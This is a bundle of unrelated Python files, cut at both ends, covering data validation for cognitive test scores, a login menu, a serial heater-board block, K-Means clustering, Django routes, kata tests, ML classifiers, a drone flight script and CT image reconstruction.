    """Load and validate 'data_to_transform.xlsx', exposing convenient views.

    Attributes:
        data_all:     full validated DataFrame (with an added 'age^2' column)
        demographics: age, age^2, sex and education columns
        cognitive:    the remaining (test score) columns
        columns:      column index of data_all
        description:  contents of the accompanying description text file

    Raises:
        ValueError: when a column is missing/unexpected or a value falls
            outside its allowed range.
    """
    def __init__(self):
        # Read relevant files.  The description file is read inside a context
        # manager so the handle is closed deterministically (the original
        # kept an open file object alive for the instance's lifetime).
        data = pd.read_excel('data/data_to_transform.xlsx')
        with open('data_descriptions/data_to_transform_description.txt', 'r') as description_file:
            description_text = description_file.read()
        # region Perform checks if the data was correctly entered
        error_dict = {'columns': 'Please be sure to use the correct column names and that they are lower case',
                      'age': 'Please use age values between 0 and 125 years, and only use integer values',
                      'sex': 'Please assure the following encoding: Male = 1, Female = 2',
                      'education': 'Please use education levels that are encoded as 6, 12, 13, 15, 17 or 21 years',
                      'sdmt': 'Please use sdmt values between 0 and 110',
                      'bvmt': 'Please use bvmt values between 0 and 36',
                      'cvlt': 'Please use cvlt values between 0 and 80'}
        allowed_range_dict = {'columns': {'age', 'sex', 'education', 'sdmt', 'bvmt', 'cvlt'},
                              'age': set(range(0,126)),
                              'sex': {1,2},
                              'education': {6,12,13,15,17,21},
                              'sdmt': set(range(0,111)),
                              'bvmt': set(range(0,37)),
                              'cvlt': set(range(0,81))}
        for key in ['columns'] + list(data.columns):
            # Extract the data vector for a specific key
            if key == 'columns':
                input_vector = set(data.columns)
            else:
                input_vector = set(data[key])
            # Check whether the vector is within the allowed range
            if not input_vector.issubset(allowed_range_dict.get(key)):
                raise ValueError(error_dict.get(key))
        # endregion
        # add age^2 column as second column to the data
        age_2 = data['age']**2
        data.insert(loc=1, column='age^2', value=age_2)  # insert age^2 in second position (thus loc = 1)
        # Create the attributes
        self.data_all = data
        self.demographics = data[['age','age^2','sex','education']]
        self.cognitive = data.drop(['age','age^2','sex','education'], axis=1)
        self.columns = data.columns
        self.description = description_text
class ConversionTable:
    """Load the SDMT/BVMT/CVLT conversion tables and their description.

    Attributes:
        sdmt, bvmt, cvlt: DataFrames with the respective conversion tables
        description:      contents of the description text file
    """
    def __init__(self):
        # Read relevant files
        self.sdmt = pd.read_csv('data/conversion_tables/sdmt_conversion_table.csv')
        self.bvmt = pd.read_csv('data/conversion_tables/bvmt_conversion_table.csv')
        self.cvlt = pd.read_csv('data/conversion_tables/cvlt_conversion_table.csv')
        # Context manager closes the description file (the original left the
        # handle open for the lifetime of the instance).
        with open('data_descriptions/conversion_table_description.txt') as description_file:
            self.description = description_file.read()
|
__author__ = "Narwhale"
from core import auth
# user_data = {
# 'account_id':None,
# 'is_authenticated':False,
# 'account_data':None
# }
def interactive():
    '''
    Customer interaction module: prints the options the customer
    can choose from.
    :return:
    '''
    print('你好!')
def run():
    '''
    Main entry point: run the login/registration flow and, on success,
    the customer-interaction module.
    :return:
    '''
    select = '''
    --------选项---------
    1.登录
    2.注册
    '''
    print(select)
    user_select = input('请输入你的选择:')
    # Dispatch through a dict of callables instead of eval() on code strings:
    # eval is unnecessary here and a dangerous habit with user-adjacent input.
    select_actions = {'1': auth.acc_login, '2': auth.acc_enroll}
    if user_select in select_actions:
        acc_data = select_actions[user_select]()
        if acc_data:
            interactive()
    else:
        print('超出选项')
|
#/usr/bin/env python
from gnuradio import gr
import serial
import threading
import time
import numpy
# Hardware addresses for Single Board Heater System components.
# These are the address bytes written on the serial line to select a
# peripheral before sending/reading its value byte (see write_serial below).
FAN_ADDR = 253
HEATER_ADDR = 254
TEMPSENSOR_ADDR = 255
class sbhs_module(gr.hier_block2, threading.Thread):
    """GNU Radio source block for the Single Board Heater System (Python 2).

    Polls the board's temperature sensor over a serial link at samp_rate Hz
    and emits the readings as float messages; fan speed and heater setpoint
    are written once at construction time.
    """
    def __init__(self, samp_rate, fan_speed, heater_temp):
        # No stream inputs; one float output fed from an internal message queue.
        gr.hier_block2.__init__(self, 'sbhs_module', gr.io_signature(0,0,0), gr.io_signature(1,1,gr.sizeof_float))
        self.init_serial()
        self.set_samp_rate(samp_rate)
        self.set_fan_speed(fan_speed)
        self.set_heater_temp(heater_temp)
        message_source = gr.message_source(gr.sizeof_int,1)
        self._msgq = message_source.msgq()
        self.connect(message_source, self)
        # Run the polling loop as a daemon thread so it dies with the process.
        threading.Thread.__init__(self)
        self.setDaemon(True)
        self.start()
    def run(self):
        # Poll the temperature sensor forever at the configured sample rate.
        while True:
            time.sleep(1.0/self._samp_rate)
            temp = self.get_temp_from_sensor()
            self._msgq.insert_tail(temp)
    def write_serial(self, hw_addr, val):
        # Protocol: one address byte followed by one value byte.
        self._serial.write(chr(hw_addr))
        self._serial.write(chr(val))
    def init_serial(self):
        # NOTE(review): device path and baud rate are hard-coded — confirm
        # they match the deployment hardware.
        self._serial = serial.Serial('/dev/ttyUSB0', 9600)
        self._serial.open()
    def get_temp_from_sensor(self):
        # Request a reading, read two bytes, concatenate their decimal values
        # and interpret the result as tenths of a degree (e.g. 3,7 -> "37" -> 3.7).
        self._serial.write(chr(TEMPSENSOR_ADDR))
        temp_val = map(ord, self._serial.read(2))
        temp_string = str(temp_val[0]) + str(temp_val[1])
        arr = numpy.array(float(temp_string)/10.0, numpy.float32)
        print "Read Temperature from Sensor: %s" %(arr)
        return gr.message_from_string(arr.tostring(), 0, gr.sizeof_float, 1)
    def set_samp_rate(self, samp_rate):
        # Polling frequency (Hz) used by the run() loop.
        self._samp_rate = samp_rate
    def set_fan_speed(self, fan_speed):
        self._fan_speed = fan_speed
        print "Setting Fan Speed: %d" %(fan_speed)
        self.write_serial(FAN_ADDR, self._fan_speed)
    def set_heater_temp(self, heater_temp):
        self._heater_temp = heater_temp
        print "Setting Heater Temp: %d" %(heater_temp)
        self.write_serial(HEATER_ADDR, self._heater_temp)
|
__authors__ = ['1531206','1456135', '1533031']
__group__ = 'GrupDM12'
import numpy as np
import pandas
import utils
import matplotlib.pyplot as plt
from sklearn.metrics import silhouette_score
from sklearn.metrics.pairwise import euclidean_distances
from scipy.spatial.distance import pdist
import numpy_indexed as npi
class KMeans:
    """K-Means clustering over pixel data with several init strategies and
    cluster-quality scores (WCD, ICD, Davis-Bouldin, Fisher, silhouette)."""

    def __init__(self, X, K=1, options=None):
        """
        Constructor of KMeans class
        Args:
            K (int): Number of clusters
            options (dict): dictionary with options
        """
        self.num_iter = 0
        self.K = K
        self._init_options(options)
        self._init_X(X)

    def _init_X(self, X):
        """Initialization of all pixels, sets X as an array of data in vector form (PxD)
        Args:
            X (list or np.array): list(matrix) of all pixel values
                if matrix has more than 2 dimensions, the dimensionality of the sample space is the length of
                the last dimension
        """
        if len(X.shape) == 2:
            self.X = X
        else:
            self.X = X.reshape((X.shape[0] * X.shape[1], X.shape[2]))
        # Delete unnecessary filthy background: drop pixels whose mean channel
        # value reaches the 'background_mask' threshold (near-white pixels).
        indexes = np.where(np.mean(self.X, 1) < self.options['background_mask'])
        self.X = self.X[indexes[0]]
        if self.X.dtype != np.float64:
            self.X = self.X.astype('float64')

    def _init_options(self, options=None):
        """
        Initialization of options in case some fields are left undefined
        Args:
            options (dict): dictionary with options
        """
        if options == None:
            options = {}
        if 'km_init' not in options:
            options['km_init'] = 'first'
        if 'verbose' not in options:
            options['verbose'] = False
        if 'tolerance' not in options:
            options['tolerance'] = 0
        if 'max_iter' not in options:
            options['max_iter'] = np.inf
        if 'fitting' not in options:
            options['fitting'] = 'WCD'
        if 'threshold' not in options:
            options['threshold'] = 0.2
        if 'background_mask' not in options:
            options['background_mask'] = 250
        self.options = options

    def _init_centroids(self):
        """
        Initialization of centroids.
        Strategies: 'first' (first K unique points), 'random', 'sharding'
        (sorted sum-splitting) and 'kmeans++' (greedy farthest point).
        """
        if self.options['km_init'].lower() == 'first':
            _, idx = np.unique(self.X, return_index=True, axis=0)
            self.centroids = self.X[np.sort(idx)]
            self.centroids = self.centroids[:self.K]
        elif self.options['km_init'].lower() == 'random':
            self.centroids = np.random.rand(self.K, self.X.shape[1]) * 255
        # Works fine but can lead to cases with empty clusters
        elif self.options['km_init'].lower() == 'sharding':
            attributes_sum = np.sum(self.X, 1)
            ordering_indexes = np.argsort(attributes_sum)
            ordered_x = self.X[ordering_indexes]
            splits = np.array_split(ordered_x, self.K)
            self.centroids = np.empty((self.K, self.X.shape[1]), dtype='float64')
            for p in range(self.K):
                self.centroids[p] = np.mean(splits[p], 0)
        elif self.options['km_init'].lower() == 'kmeans++':
            shape = self.X.shape[0]
            self.centroids = np.empty((self.K, self.X.shape[1]), dtype='float64')
            self.centroids[0] = self.X[np.random.randint(shape), :]
            for k in range(1, self.K):
                # next centroid = point farthest from its nearest centroid
                distances = np.amin(distance(self.X, self.centroids), axis=1)
                self.centroids[k] = self.X[np.argmax(distances), :]
        self.old_centroids = np.empty_like(self.centroids)

    def get_labels(self):
        """
        Calculates the closest centroid of all points in X
        and assigns each point to the closest centroid
        """
        distances = distance(self.X, self.centroids)
        self.labels = np.argmin(distances, axis=1)
        # distance of each point to its assigned centroid (used by scores)
        self.labels_distances = np.amin(distances, axis=1)

    def get_centroids(self):
        """
        Calculates coordinates of centroids based on the coordinates of all the points assigned to the centroid
        """
        self.old_centroids = np.array(self.centroids)
        for k in range(self.K):
            # empty clusters keep their previous centroid
            if (self.labels == k).sum() > 0:
                self.centroids[k] = np.mean(self.X[self.labels == k], axis=0)

    def converges(self):
        """
        Checks if there is a difference between current and old centroids
        """
        # NOTE(review): the tolerance is passed positionally as np.allclose's
        # rtol (relative tolerance), not atol — confirm this is intended.
        return np.allclose(self.centroids, self.old_centroids, self.options["tolerance"])

    def fit(self):
        """
        Runs K-Means algorithm until it converges or until the number
        of iterations is smaller than the maximum number of iterations.
        """
        self.num_iter = 0
        self._init_centroids()
        while not self.converges() and self.num_iter < self.options["max_iter"]:
            self.get_labels()
            self.get_centroids()
            self.num_iter += 1

    def within_class_distance(self):
        """
        returns the within class distance of the current clustering
        """
        clusters = npi.group_by(self.labels).split(self.X)
        sumup = 1.0
        for i in range(len(clusters)):
            sumup += np.nanmean(euclidean_distances(clusters[i], clusters[i]))
        return sumup

    def within_class_distance_fast(self):
        """
        returns a faster variant of the within class distance of the current clustering
        """
        return np.mean(self.labels_distances)

    def inter_class_distance(self):
        """
        returns the inter class distance of the current clustering
        """
        clusters = npi.group_by(self.labels).split(self.X)
        sumup = 1.0
        # sum of mean pairwise distances over all distinct cluster pairs
        for i in range(len(clusters)):
            for j in range(i, len(clusters)):
                if i != j:
                    sumup += np.mean(euclidean_distances(clusters[i], clusters[j]))
        return sumup

    def inter_centroids_distance(self):
        """
        returns the inter centroids distance of the current clustering
        """
        return np.mean(euclidean_distances(self.centroids, self.centroids))

    def davis_bouldin_score(self):
        """
        returns the davis bouldin score of the current clustering
        """
        sumup = 1
        split_distances = npi.group_by(self.labels).split(self.labels_distances)
        for i in range(len(split_distances)):
            mean_distance_i = np.mean(split_distances[i])
            for j in range(i, len(split_distances)):
                mean_distance_j = np.mean(split_distances[j])
                if i != j:
                    dist = self.centroids[i] - self.centroids[j]
                    sumup += (mean_distance_i + mean_distance_j) / (dist * dist).sum()
        return sumup / self.K

    def silhouette_score(self):
        """
        returns the silhouette score of the current clustering
        """
        a = self.within_class_distance()
        b = self.inter_class_distance()
        return (b-a) / max(a,b)

    def fisher_score(self):
        """
        returns the fisher score of the current clustering
        """
        a = self.within_class_distance()
        b = self.inter_class_distance()
        return a/b

    def perform_score(self):
        # Dispatch to the scoring function selected by options['fitting'].
        if self.options['fitting'] == "WCD":
            return self.within_class_distance()
        elif self.options['fitting'] == "ICD":
            return self.inter_class_distance()
        elif self.options['fitting'] == "DB":
            return self.davis_bouldin_score()
        elif self.options['fitting'] == "fisher":
            return self.fisher_score()
        elif self.options['fitting'] == "silhouette":
            return self.silhouette_score()

    def find_bestK(self, max_K):
        """
        sets the best K analysing the results up to 'max_K' clusters
        (elbow heuristic using options['threshold'] on relative score change)
        """
        best_k = self.K
        self.K = 1
        self.fit()
        # For some reason, python erases from existence the labels in some rare exceptional cases...
        while not hasattr(self, 'labels'):
            self.fit()
        score = self.perform_score()
        for k in range(2, max_K+1):
            self.K = k
            self.fit()
            new_score = self.perform_score()
            if self.options['fitting'] == "silhouette":
                # silhouette: stop when the score starts decreasing
                if new_score < score or k == max_K:
                    best_k = k-1
                    break
            elif self.options['fitting'] == "ICD":
                # ICD grows with k: stop when the relative gain is too small
                if (new_score/score - 1) < self.options['threshold'] or k == max_K:
                    if k == max_K:
                        best_k = k
                    else:
                        best_k = k-1
                    break
            else:
                # WCD/DB/fisher shrink with k: stop when the relative drop is small
                if (1 - new_score/score) < self.options['threshold'] or k == max_K:
                    if k == max_K:
                        best_k = k
                    else:
                        best_k = k-1
                    break
            score = new_score
        self.K = best_k
def distance(X, C):
    """Pairwise *squared* Euclidean distances between two point sets.

    Args:
        X (numpy array): PxD set of data points
        C (numpy array): KxD set of points (usually cluster centroids)

    Returns:
        PxK numpy array whose (i, j) entry is the squared distance between
        the i-th point of X and the j-th point of C.  No square root is
        taken; argmin-based assignment is unaffected.
    """
    diff = X[:, None, :] - C[None, :, :]
    return np.square(diff).sum(-1)
def get_colors(centroids):
    """Map each centroid to the most probable of the 11 basic color labels.

    Args:
        centroids (numpy array): KxD set of centroid coordinates

    Returns:
        K color labels: utils.colors indexed by the argmax of each
        centroid's color-probability row.
    """
    color_probs = utils.get_color_prob(centroids)
    best = np.argmax(color_probs, axis=1)
    return utils.colors[best]
from bsm.util import ensure_list
# Maps a package sub-directory key to the environment variable that should
# have that directory prepended (e.g. 'bin' directories go onto PATH).
PATH_ENV = {
    'bin': 'PATH',
    'lib': 'LD_LIBRARY_PATH',
    'man': 'MANPATH',
    'info': 'INFOPATH',
    'pkgconfig': 'PKG_CONFIG_PATH',
    'cmake': 'CMAKE_PREFIX_PATH',
    'python': 'PYTHONPATH',
    'marlin': 'MARLIN_DLL',
}
def run(param, cfg):
    """Populate default environment settings for a package configuration.

    Sets <NAME>_HOME/_SOURCE/_BIN/_LIB/_INCLUDE variables (when applicable)
    and prepends every known path category to its corresponding environment
    variable (see PATH_ENV).  Existing entries in cfg are never overwritten.
    """
    name = param['name']
    category = param['category']
    env_cfg = cfg.setdefault('env', {})
    set_env = env_cfg.setdefault('set_env', {})
    set_env.setdefault(name+'_HOME', '{install}')
    # _SOURCE only makes sense when the source tree is kept around
    if category != 'data' and 'source' not in cfg.get('clean', []):
        set_env.setdefault(name+'_SOURCE', '{source}')
    paths = cfg.get('path', {})
    if 'bin' in paths:
        set_env.setdefault(name+'_BIN', '{bin}')
    if 'lib' in paths:
        set_env.setdefault(name+'_LIB', '{lib}')
    if 'inc' in paths:
        set_env.setdefault(name+'_INCLUDE', '{inc}')
    prepend = env_cfg.setdefault('prepend_path', {})
    for subdir, env_var in PATH_ENV.items():
        if subdir in paths:
            prepend[env_var] = ensure_list(prepend.get(env_var, []))
            # '{{{0}}}' renders as a literal '{subdir}' placeholder
            prepend[env_var].append('{{{0}}}'.format(subdir))
|
from django.conf.urls import url
from djofx import views
# Account URL routes; both patterns map to the same view, the second passing
# {'unverified': True} as extra view kwargs.
urlpatterns = [
    url(r'^(?P<pk>\d+)/$', views.account_detail, name="djofx_account"),
    url(
        r'^(?P<pk>\d+)/unverified/$',
        views.account_detail,
        {'unverified': True},
        name="djofx_account_unverified"
    ),
]
|
import unittest
from katas.beta.replace_multiples_with_string import getNumber, getNumberRange
class ReplaceMultiplesWithStringTestCase(unittest.TestCase):
    """Tests for getNumber/getNumberRange: multiples of 3 map to 'THREE',
    multiples of 5 to 'FIVE', multiples of both (including 0) to 'BOTH',
    and everything else is returned unchanged; negatives and descending
    ranges are covered as well."""
    def test_equals(self):
        self.assertEqual(getNumber(0), 'BOTH')
    def test_equals_2(self):
        self.assertEqual(getNumber(1), 1)
    def test_equals_3(self):
        self.assertEqual(getNumber(2), 2)
    def test_equals_4(self):
        self.assertEqual(getNumber(3), 'THREE')
    def test_equals_5(self):
        self.assertEqual(getNumber(4), 4)
    def test_equals_6(self):
        self.assertEqual(getNumber(5), 'FIVE')
    def test_equals_7(self):
        self.assertEqual(getNumber(10), 'FIVE')
    def test_equals_8(self):
        self.assertEqual(getNumber(15), 'BOTH')
    def test_equals_9(self):
        self.assertEqual(getNumber(18), 'THREE')
    def test_equals_10(self):
        self.assertEqual(getNumber(19), 19)
    def test_equals_11(self):
        self.assertEqual(getNumber(30), 'BOTH')
    def test_equals_12(self):
        self.assertEqual(getNumber(150), 'BOTH')
    def test_equals_13(self):
        self.assertEqual(getNumber(-1), -1)
    def test_equals_14(self):
        self.assertEqual(getNumber(-3), 'THREE')
    def test_equals_15(self):
        self.assertEqual(getNumber(-15), 'BOTH')
    def test_equals_16(self):
        self.assertEqual(getNumber(-50), 'FIVE')
    def test_equals_17(self):
        self.assertEqual(getNumberRange(1, 15), [
            1, 2, 'THREE', 4, 'FIVE', 'THREE', 7, 8, 'THREE', 'FIVE', 11,
            'THREE', 13, 14, 'BOTH'
        ])
    def test_equals_18(self):
        self.assertEqual(getNumberRange(1, -15), [
            1, 'BOTH', -1, -2, 'THREE', -4, 'FIVE', 'THREE', -7, -8,
            'THREE', 'FIVE', -11, 'THREE', -13, -14, 'BOTH'
        ])
|
from sklearn import neighbors
from sklearn.model_selection import StratifiedShuffleSplit, GridSearchCV
import tensorflow as tf
from tensorflow import keras
def knn(X, Y, seed):
    """Return a K-NN model fitted with the best parameters found by
    grid search over a 3-fold stratified shuffle split, scored on F1."""
    base = neighbors.KNeighborsClassifier(algorithm='auto')
    grid = {'n_neighbors': [1, 5, 9, 13, 17, 21, 25, 29, 33, 37], 'weights': ['uniform', 'distance']}
    # Grid search on the parameters, to find the best score.
    cv = StratifiedShuffleSplit(n_splits=3, random_state=seed)
    search = GridSearchCV(base, grid, cv=cv, scoring="f1")
    search.fit(X, Y)
    best_model = search.best_estimator_
    print("score={}\nModel: {}".format(search.best_score_, best_model))
    return best_model
def neural_net(X, Y):
    """Return a trained feed-forward binary classifier.

    Architecture: Dense 32-32-128-128-32 with ReLU activations, followed by
    a single sigmoid output.  Trains for 20 epochs with a 10% validation
    split, minimizing mean squared error.
    """
    model = keras.Sequential([
        keras.layers.Dense(32, input_dim=len(X[0])),
        keras.layers.Activation("relu"),
        keras.layers.Dense(32),
        keras.layers.Activation("relu"),
        keras.layers.Dense(128),
        keras.layers.Activation("relu"),
        keras.layers.Dense(128),
        keras.layers.Activation("relu"),
        keras.layers.Dense(32),
        keras.layers.Activation("relu"),
        keras.layers.Dense(1, activation='sigmoid')
    ])
    # Use the adam optimizer.  BUG FIX: the configured Adam(lr=0.01) instance
    # was previously discarded because the string 'adam' (default lr=0.001)
    # was passed to compile(); pass the instance so lr=0.01 takes effect.
    adam = keras.optimizers.Adam(lr=0.01)
    model.compile(optimizer=adam, loss='mean_squared_error', metrics=['accuracy'])
    # Training
    model.fit(X, Y, epochs=20, validation_split=0.1)
    return model
|
#!/usr/bin/env python
# Python 2 script: fly a 5 m square at 5 m altitude, then land.
import time
from flyt_python import api
drone = api.navigation(timeout=120000)  # instance of the flyt navigation class
# at least 3sec sleep time for the drone interface to initialize properly
time.sleep(3)
print 'taking off'
drone.take_off(5.0)
print ' going along the setpoints'
# Four relative setpoints trace a square: +x, +y, -x, -y (5 m legs).
drone.position_set(5, 0, 0, relative=True)
drone.position_set(0, 5, 0, relative=True)
drone.position_set(-5, 0, 0, relative=True)
drone.position_set(0, -5, 0, relative=True)
print 'Landing'
drone.land(async=False)  # blocking land ('async' keyword is valid on Python 2)
# shutdown the instance
drone.disconnect()
|
import numpy as np
import torch
import os
import pickle
import utils
from torch.utils.data import Dataset, TensorDataset, DataLoader
import matplotlib.pyplot as plt
import time
# ======================================================================================================================
# Define proj_M_L2O Operator
# ======================================================================================================================
def proj_M_L2O(u_gen0, list_J, his_wass, gamma_constant, alpha, step_type, device):
    """Relaxed projection operator driven by learned networks (L2O).

    Args:
        u_gen0: initial image batch (tensor, n_samples x ...).
        list_J: list of pre-trained networks J_k, indexed by iteration.
        his_wass: Wasserstein/average distances used to scale step sizes.
        gamma_constant: scalar multiplying the gamma_k anchor sequence.
        alpha: step-size constant in (0, 1).
        step_type: 'Mean', 'Combined' or 'Individual' step-size rule.
        device: torch device for the intermediate tensors.

    Returns:
        Detached tensor after the relaxed projection iterations.

    NOTE(review): the iteration count comes from a module-level global
    ``num_gen`` (not a parameter) — confirm it is defined before this is
    called.
    """
    # gradients w.r.t. the iterate are needed to evaluate nabla J
    u_gen = u_gen0.detach().clone()
    u_gen.requires_grad_(True)
    n_samples = u_gen.shape[0]
    start_time = time.time()
    # perform relaxed projections
    for gen_iter in range(1, num_gen):
        Jout = list_J[gen_iter](u_gen) # n_samples x 1
        # take derivative w.r.t only inputs
        nablaJ = torch.autograd.grad(outputs=Jout, inputs=u_gen,
                                     grad_outputs=torch.ones(Jout.size()).to(device), only_inputs=True)[0].detach()
        # anchor pulls the iterate back toward the initial point with
        # weight gamma_constant / gen_iter (vanishing as iterations grow)
        gamma_gen_iter = gamma_constant / gen_iter
        anchor = gamma_gen_iter * u_gen0
        # step size, combines general and individual step size
        if step_type == 'Mean':
            lam = alpha * (his_wass[gen_iter - 1])
        elif step_type == 'Combined':
            lam = alpha * (his_wass[gen_iter - 1] + torch.max(Jout.detach(), torch.zeros(Jout.size(), device=device)))
        elif step_type == 'Individual':
            lam = alpha * (torch.max(Jout.detach(), torch.zeros(Jout.size(), device=device)))
        # lambda * gradient term; reshape to multiply by lam, then reshape back
        lam_gradient_term = (lam * (nablaJ.reshape(n_samples, -1))).reshape(u_gen.shape)
        u_gen = anchor + (1 - gamma_gen_iter) * (u_gen - lam_gradient_term)
    end_time = time.time()
    # print(f'proj_M_L2O time: {end_time - start_time}')
    u_gen = u_gen.detach()
    return u_gen
# ======================================================================================================================
# Load Validation Set
# ======================================================================================================================
# Paths to the pickled validation set and to the trained experiment folder.
# NOTE(review): the hyper-parameters hard-coded below must match the values
# encoded in the experiment folder name -- verify before changing either.
CTEllipses_folder = './CTEllipse/experimentsEllipse/'
dataset_path = CTEllipses_folder + 'ellipses__val_size-1000_tv_lam-0.001__beams-30__noise-0.025__july-16-2020.pkl'
experiment_path = './CTEllipse/experimentsEllipse/' \
                  'ellipseCT_2020-10-04-11-16-01_lr1e-05_genFreq200_nTrain10000_batchSize16_optimADAM_etaFreq20_gamma_const1e-01_etaTol1e-05_noise_level5e-03_alpha5e-01_gp_lam20_distMan_lam1e-01_lr_decay_iter50doAugment0_architectureHuber_stepTypeMean_tvlam001'
# proj_M_L2O constants (based on experiment_path)
gamma_constant = 1e-1
alpha = 0.5
step_type = 'Mean'
image_scaling = 'unit'
# data value range per scaling mode, used for SSIM/PSNR computations below
data_range = {"unit": 1.0, "symmetric": 2.0}
device = 'cpu'
from adversarial_networks import discriminator_net_Huber as discriminator_net; architecture = 'Huber' # USING FC at the end
# Load the validation pickle: 'y' = measured sinograms, 'x_true' = ground
# truth images, 'tv' = TV-regularized reconstructions used as start point.
with open(dataset_path, 'rb') as f:
    load_dataset = pickle.load(f)
b_data = load_dataset['y']
u_true = load_dataset['x_true']
u_gen0 = load_dataset['tv']
# swap dimensions so that u_train is n_samples x n_channels x n_feature1 x n_feature2
b_data = np.transpose(b_data, [0, 3, 1, 2])
u_true = np.transpose(u_true, [0, 3, 1, 2])
u_gen0 = np.transpose(u_gen0, [0, 3, 1, 2])
print("u_true.shape = ", u_true.shape)
print("u_gen0.shape = ", u_gen0.shape)
print("b_data.shape = ", b_data.shape)
# Renormalize everything to the unit interval [0,1]
# for idx in range(u_gen0.shape[0]):
#     u_gen0[idx] = utils.scale_to_interval(u_gen0[idx], image_scaling)
# ======================================================================================================================
# Choose image(s) to be projected
# ======================================================================================================================
ind_val1 = 80
# ind_val1 = 100
# ind_val1 = 110
# ind_val1 = 1000
# ind_val1 = 1001
n_images = ind_val1 + 1
# ind_val1 = 0
# n_images = 1000
# Slice out the single validation image at index ind_val1 and move to torch.
b_data = torch.FloatTensor(b_data[ind_val1:n_images,:,:,:])
u_true = torch.FloatTensor(u_true[ind_val1:n_images,:,:,:])
u_gen0 = torch.FloatTensor(u_gen0[ind_val1:n_images,:,:,:])
# gen_zero_dataset_fbp = gen_zero_dataset_fbp[0:n_images,:,:,:].reshape(n_images,128,128,1)
print("u_true.shape = ", u_true.shape)
print("gen_zero_dataset.shape = ", u_gen0.shape)
print("b_data.shape = ", b_data.shape)
print()
print(f'u_true.min(): {u_true.min()}')
print(f'u_true.max(): {u_true.max()}')
print(f'u_gen0.min(): {u_gen0.min()}')
print(f'u_gen0.max(): {u_gen0.max()}')
print()
# ======================================================================================================================
# Load Pretrained Weights
# ======================================================================================================================
# models_path = os.path.join(experiment_path, './checkpoints/')
models_path = experiment_path + '/checkpoints/'
list_files = [name for name in os.listdir(models_path)]
list_files.sort()
# print('list_files:', list_files)
# num_gen = len(list_files) # so the number of files in checkpoints should be the number of generators
num_gen = 20 # pick a spot to stop
list_J = []
# Loading the J's (one trained discriminator network per checkpoint file).
# NOTE(review): this loop loads *all* files in checkpoints/, not just the
# first num_gen of them -- verify that is intended.
for idx, filename in enumerate(list_files):
    assert(filename[0:5] == 'step_')
    # print(f'filename: (unknown)')
    # checkpoints are zero-padded to two digits: step_00.pth ... step_NN.pth
    if idx < 10:
        load_J = torch.load(models_path + 'step_0' + str(idx) + '.pth', map_location='cpu')
    else:
        load_J = torch.load(models_path + 'step_' + str(idx) + '.pth', map_location='cpu')
    netD = discriminator_net()
    netD.load_state_dict(load_J['state_dict'])
    netD.eval()
    list_J.append(netD)
# Load the last J for his_wass (the Wasserstein-distance history used as a
# step-size scale in proj_M_L2O).
# NOTE(review): this indexes checkpoint step_<num_gen> while the loop above
# used indices 0..len(list_files)-1; confirm the off-by-one is intentional.
if num_gen < 10:
    his_wass = torch.load(models_path + 'step_0' + str(num_gen) + '.pth', map_location='cpu')['his_wass']
else:
    his_wass = torch.load(models_path + 'step_' + str(num_gen) + '.pth', map_location='cpu')['his_wass']
# ======================================================================================================================
# Load ODL Operators
# ======================================================================================================================
import odl
# extremely important that the correct ODL GitHub functions are available
from odl.contrib import torch as odl_torch
n_mesh = 128
space = odl.uniform_discr([-64, -64], [64, 64], [n_mesh, n_mesh],
                          dtype='float32')
n_angles = 30
geometry = odl.tomo.parallel_beam_geometry(space, num_angles=n_angles)
fwd_op = odl.tomo.RayTransform(space, geometry)
opnorm = odl.power_method_opnorm(fwd_op)
fwd_op = (1 / opnorm) * fwd_op # normalize fwd operator to be scale-invariant
L = odl.power_method_opnorm(fwd_op.adjoint*fwd_op)
print('fwd_op.adjoint*fwd_op = ', fwd_op.adjoint*fwd_op)
print('L = ', L)
# ======================================================================================================================
# Relaxed Projected Gradient Descent
#
#   min_u  H(u) + delta_M(u),   where  H(u) := (1/2) * ||A u - b||_2^2
#
# and delta_M is the indicator of the learned set M. For kappa in (0,1) and
# xi in (0, 2/Lip(H)) the iteration used below is
#
#   u_{k+1} = (1 - kappa) * u_k + kappa * P_M(u_k - xi * grad H(u_k))
# ======================================================================================================================
# computing only one projection (baseline metrics before the main loop):
SSIM0, PSNR0 = utils.compute_avg_SSIM_PSNR(u_true, u_gen0, n_mesh,
                                           data_range[image_scaling])
u1 = proj_M_L2O(u_gen0, list_J, his_wass, gamma_constant, alpha, step_type, device)
relerr1 = torch.norm(u1 - u_true)/torch.norm(u_true)
SSIM1, PSNR1 = utils.compute_avg_SSIM_PSNR(u_true, u1, n_mesh,
                                           data_range[image_scaling])
print(
    'relerr1: %.3e PSNR1: %.3e SSIM1: %.3e'
    % (relerr1, PSNR1, SSIM1))
# apply the learned projection a second time to gauge its fixed-point behavior
u2 = proj_M_L2O(u1, list_J, his_wass, gamma_constant, alpha, step_type, device)
relerr2 = torch.norm(u2 - u_true)/torch.norm(u_true)
SSIM2, PSNR2 = utils.compute_avg_SSIM_PSNR(u_true, u2, n_mesh,
                                           data_range[image_scaling])
print(
    'relerr2: %.3e PSNR2: %.3e SSIM2: %.3e'
    % (relerr2, PSNR2, SSIM2))
# Iteration state and hyper-parameters for the main loop below.
uk = u_gen0.clone()
yk = torch.zeros(uk.shape)
kappa = 1e-1
n_samples = uk.shape[0]
max_iters = 10
xi = 8e-2 / L
print('\n\n' + experiment_path)
print('n_images = ', n_images)
print('\n\n ----------- Relaxed Projected Gradient Descent ----------- \n')
print('kappa: %.2e max_iters: %.d xi: %.2e alpha: %.2e num_gen: %d'
      % (kappa, max_iters, xi, alpha, num_gen))
# Main relaxed-projected-gradient loop: gradient step on the data-fidelity
# term H, then a relaxed projection onto the learned set via proj_M_L2O.
for k in range(max_iters):
    start_time = time.time()
    # gradient of H(u) = 0.5*||A u - b||^2 is A^T (A u - b)
    Auk = odl_torch.OperatorFunction.apply(fwd_op, uk)
    grad_H_uk = odl_torch.OperatorFunction.apply(fwd_op.adjoint, Auk - b_data)
    yk = uk - xi * grad_H_uk
    # relaxed update: u <- (1 - kappa) * u + kappa * P_M(u - xi * grad H(u))
    uk = (1-kappa) * uk + kappa * proj_M_L2O(yk, list_J, his_wass, gamma_constant, alpha, step_type, device)
    relerr = torch.norm(uk - u_true)/torch.norm(u_true)
    SSIM, PSNR = utils.compute_avg_SSIM_PSNR(u_true, uk, n_mesh,
                                             data_range[image_scaling])
    # 2x2 diagnostic figure: start image, ground truth, one projection, and
    # the current iterate, each annotated with SSIM/PSNR.
    plt.figure()
    suptitle_str = 'k = ' + str(k + 1)
    plt.suptitle(suptitle_str)
    plt.subplot(2, 2, 1)
    plt.imshow(u_gen0[0, 0, :, :], clim=(0, 1))
